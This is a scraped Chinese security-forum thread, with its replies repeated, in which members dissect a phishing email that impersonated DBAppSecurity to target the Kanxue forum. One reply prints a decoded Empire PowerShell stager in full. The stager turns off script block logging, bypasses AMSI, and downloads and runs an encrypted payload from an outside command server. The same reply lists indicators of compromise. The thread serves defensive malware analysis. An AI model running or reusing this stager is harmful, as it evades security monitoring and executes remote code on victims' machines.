[注意]收到一个木马邮件，发上来大家玩玩-软件逆向-看雪-安全社区|安全招聘|kanxue.com

最新回复 (11)
任蝶飞雪币： 5448 活跃值： (3596) 能力值： ( LV2，RANK：10 ) 在线值：发帖 21 回帖 248 粉丝 0 关注私信	任蝶飞 2 楼先不说技术，这个中文看着像是机器翻译的。。。 2019-11-5 10:36 0
kanxue 雪币： 44229 活跃值： (19980) 能力值： (RANK：350 ) 在线值：发帖 2369 回帖 17027 粉丝 529 关注私信	kanxue 8 3 楼第一封邮件冒充安恒公司，下面还有一个安恒的logo。安恒的官网是：https://www.dbappsecurity.com.cn/ 2019-11-5 10:41 0
boursonjane 雪币： 2460 活跃值： (2954) 能力值： ( LV3，RANK：20 ) 在线值：发帖 6 回帖 181 粉丝 13 关注私信	boursonjane 4 楼其实是中国人, 故意用机翻, 假冒自己是外国人 2019-11-5 11:45 0
jishuzhain 雪币： 17421 活跃值： (5004) 能力值： ( LV9，RANK：450 ) 在线值：发帖 52 回帖 137 粉丝 68 关注私信	jishuzhain 7 5 楼恶意代码是powershell payload，使用的是Empire项目生成的payload，解码后如下： IF($PSVErSIoNTABLe.PSVerSion.MAJor -ge 3){$GPS=[rEf].AssEmBLY.GetTYPe('System.Management.Automation.Utils')."GetFiE`Ld"('cachedGroupPolicySettings','N'+'onPublic,Static').GETVaLUe($nulL);If($GPS['ScriptB'+'lockLogging']){$GPS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}ElsE{[SCrIpTBLock]."GeTFIE`Ld"('signatures','N'+'onPublic,Static').SetVALuE($Null,(NEW-ObjecT COLlectionS.GEnEriC.HaShSEt[sTRInG]))}[REf].ASSeMBLy.GetTypE('System.Management.Automation.AmsiUtils')\|?{$_}\|%{$_.GetFIELD('amsiInitFailed','NonPublic,Static').SETVaLUE($nuLl,$TrUe)};};[SySTem.NEt.ServICePoinTMANAGer]::ExPecT100CONtinUe=0;$wC=NeW-ObjECT SySTEM.NeT.WEbCLiEnt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HEadERS.Add('User-Agent',$u);$wc.PROxY=[SyStEm.NeT.WeBREQuEST]::DefAultWeBPROXY;$wC.PRoxy.CReDenTiALS = [SySTEM.NEt.CredEntiAlCACHe]::DEfaultNEtWORKCrEdEnTialS;$Script:Proxy = $wc.Proxy;$K=[SYStem.TexT.ENCODInG]::ASCII.GeTByTES('.};Pw5=?crvu0~mikL#*&_%qOFHREj:\|');$R={$D,$K=$ARGs;$S=0..255;0..255\|%{$J=($J+$S[$_]+$K[$_%$K.COuNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D\|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxOr$S[($S[$I]+$S[$H])%256]}};$ser='http://www2.netstorehosting.com:80';$t='/login/process.php';$WC.HEAdERs.ADd("Cookie","session=szQQtljIH3ITKRUXhK+5KeXNHE8=");$DATa=$WC.DOwnlOAdDAtA($sER+$T);$iv=$data[0..3];$dAtA=$DATA[4..$DAtA.LEngtH];-join[CHaR[]](& $R $dATA ($IV+$K))\|IEX IOC 如下： url http://www.dbappsecurtiy.com/pediy/error.hta sha256 93b1707cbe27f7f515c089b6896591df616ce8c37b9fbbe932337f9531e20d57 sha1 f49d99a94c4c643270578106ef39f0f07f2696c8 md5 584437bc8063b64fb65d2882a7ddbd89 domain www2.netstorehosting.com ip 45.89.175.192 2019-11-5 11:55 0
無材雪币： 54 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	無材 6 楼是冒充安恒的钓鱼链接，安恒是dbappsecu `rity`，链接中是dbappsecu `rtiy` 2019-11-5 12:21 0
冰雪冬樱雪币： 164 活跃值： (99) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 234 粉丝 1 关注私信	冰雪冬樱 7 楼钓鱼安全论坛管理怎么想的 2019-11-5 13:44 0
熊猫正正雪币： 2323 活跃值： (4113) 能力值： ( LV12，RANK：530 ) 在线值：发帖 137 回帖 898 粉丝 139 关注私信	熊猫正正 9 8 楼冒充安恒信息对看雪论坛的一次定向钓鱼攻击 https://mp.weixin.qq.com/s/59y2pG0XnjDY49ogjcE_mA 最后于 2019-11-5 14:49 被熊猫正正编辑，原因： 2019-11-5 14:48 0
挽梦雪舞雪币： 25937 活跃值： (1409) 能力值： ( LV4，RANK：50 ) 在线值：发帖 22 回帖 432 粉丝 21 关注私信	挽梦雪舞 9 楼我就“傻傻”地直接在Chrome上打开了链接，可惜标红拦截了。。哎，失望。。 2019-11-5 15:01 0
新user 雪币： 1408 活跃值： (68) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 25 粉丝 0 关注私信	新user 10 楼熊猫正正冒充安恒信息对看雪论坛的一次定向钓鱼攻击 https://mp.weixin.qq.com/s/59y2pG0XnjDY49ogjcE_mA 这波分析是真的快， 2019-11-5 15:02 0
frozenrain 雪币： 107 活跃值： (1638) 能力值： ( LV6，RANK：80 ) 在线值：发帖 26 回帖 509 粉丝 1 关注私信	frozenrain 11 楼坛主用的是Mac，对坛主进行apt攻击失败。 2019-11-5 19:47 0
首席小白雪币： 283 活跃值： (23) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	首席小白 12 楼 Freebuf上发了这帖子出来..针对看雪的钓鱼..好像也没说出个所以然.23333 2019-11-6 09:55 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (11)
任蝶飞雪币： 5448 活跃值： (3596) 能力值： ( LV2，RANK：10 ) 在线值：发帖 21 回帖 248 粉丝 0 关注私信	任蝶飞 2 楼先不说技术，这个中文看着像是机器翻译的。。。 2019-11-5 10:36 0
kanxue 雪币： 44229 活跃值： (19980) 能力值： (RANK：350 ) 在线值：发帖 2369 回帖 17027 粉丝 529 关注私信	kanxue 8 3 楼第一封邮件冒充安恒公司，下面还有一个安恒的logo。安恒的官网是：https://www.dbappsecurity.com.cn/ 2019-11-5 10:41 0
boursonjane 雪币： 2460 活跃值： (2954) 能力值： ( LV3，RANK：20 ) 在线值：发帖 6 回帖 181 粉丝 13 关注私信	boursonjane 4 楼其实是中国人, 故意用机翻, 假冒自己是外国人 2019-11-5 11:45 0
jishuzhain 雪币： 17421 活跃值： (5004) 能力值： ( LV9，RANK：450 ) 在线值：发帖 52 回帖 137 粉丝 68 关注私信	jishuzhain 7 5 楼恶意代码是powershell payload，使用的是Empire项目生成的payload，解码后如下： IF($PSVErSIoNTABLe.PSVerSion.MAJor -ge 3){$GPS=[rEf].AssEmBLY.GetTYPe('System.Management.Automation.Utils')."GetFiE`Ld"('cachedGroupPolicySettings','N'+'onPublic,Static').GETVaLUe($nulL);If($GPS['ScriptB'+'lockLogging']){$GPS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}ElsE{[SCrIpTBLock]."GeTFIE`Ld"('signatures','N'+'onPublic,Static').SetVALuE($Null,(NEW-ObjecT COLlectionS.GEnEriC.HaShSEt[sTRInG]))}[REf].ASSeMBLy.GetTypE('System.Management.Automation.AmsiUtils')\|?{$_}\|%{$_.GetFIELD('amsiInitFailed','NonPublic,Static').SETVaLUE($nuLl,$TrUe)};};[SySTem.NEt.ServICePoinTMANAGer]::ExPecT100CONtinUe=0;$wC=NeW-ObjECT SySTEM.NeT.WEbCLiEnt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HEadERS.Add('User-Agent',$u);$wc.PROxY=[SyStEm.NeT.WeBREQuEST]::DefAultWeBPROXY;$wC.PRoxy.CReDenTiALS = [SySTEM.NEt.CredEntiAlCACHe]::DEfaultNEtWORKCrEdEnTialS;$Script:Proxy = $wc.Proxy;$K=[SYStem.TexT.ENCODInG]::ASCII.GeTByTES('.};Pw5=?crvu0~mikL#*&_%qOFHREj:\|');$R={$D,$K=$ARGs;$S=0..255;0..255\|%{$J=($J+$S[$_]+$K[$_%$K.COuNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D\|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxOr$S[($S[$I]+$S[$H])%256]}};$ser='http://www2.netstorehosting.com:80';$t='/login/process.php';$WC.HEAdERs.ADd("Cookie","session=szQQtljIH3ITKRUXhK+5KeXNHE8=");$DATa=$WC.DOwnlOAdDAtA($sER+$T);$iv=$data[0..3];$dAtA=$DATA[4..$DAtA.LEngtH];-join[CHaR[]](& $R $dATA ($IV+$K))\|IEX IOC 如下： url http://www.dbappsecurtiy.com/pediy/error.hta sha256 93b1707cbe27f7f515c089b6896591df616ce8c37b9fbbe932337f9531e20d57 sha1 f49d99a94c4c643270578106ef39f0f07f2696c8 md5 584437bc8063b64fb65d2882a7ddbd89 domain www2.netstorehosting.com ip 45.89.175.192 2019-11-5 11:55 0
無材雪币： 54 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	無材 6 楼是冒充安恒的钓鱼链接，安恒是dbappsecu `rity`，链接中是dbappsecu `rtiy` 2019-11-5 12:21 0
冰雪冬樱雪币： 164 活跃值： (99) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 234 粉丝 1 关注私信	冰雪冬樱 7 楼钓鱼安全论坛管理怎么想的 2019-11-5 13:44 0
熊猫正正雪币： 2323 活跃值： (4113) 能力值： ( LV12，RANK：530 ) 在线值：发帖 137 回帖 898 粉丝 139 关注私信	熊猫正正 9 8 楼冒充安恒信息对看雪论坛的一次定向钓鱼攻击 https://mp.weixin.qq.com/s/59y2pG0XnjDY49ogjcE_mA 最后于 2019-11-5 14:49 被熊猫正正编辑，原因： 2019-11-5 14:48 0
挽梦雪舞雪币： 25937 活跃值： (1409) 能力值： ( LV4，RANK：50 ) 在线值：发帖 22 回帖 432 粉丝 21 关注私信	挽梦雪舞 9 楼我就“傻傻”地直接在Chrome上打开了链接，可惜标红拦截了。。哎，失望。。 2019-11-5 15:01 0
新user 雪币： 1408 活跃值： (68) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 25 粉丝 0 关注私信	新user 10 楼熊猫正正冒充安恒信息对看雪论坛的一次定向钓鱼攻击 https://mp.weixin.qq.com/s/59y2pG0XnjDY49ogjcE_mA 这波分析是真的快， 2019-11-5 15:02 0
frozenrain 雪币： 107 活跃值： (1638) 能力值： ( LV6，RANK：80 ) 在线值：发帖 26 回帖 509 粉丝 1 关注私信	frozenrain 11 楼坛主用的是Mac，对坛主进行apt攻击失败。 2019-11-5 19:47 0
首席小白雪币： 283 活跃值： (23) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	首席小白 12 楼 Freebuf上发了这帖子出来..针对看雪的钓鱼..好像也没说出个所以然.23333 2019-11-6 09:55 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[注意]收到一个木马邮件，发上来大家玩玩

冒充安恒信息对看雪论坛的一次定向钓鱼攻击 https://mp.weixin.qq.com/s/59y2pG0XnjDY49ogjcE_mA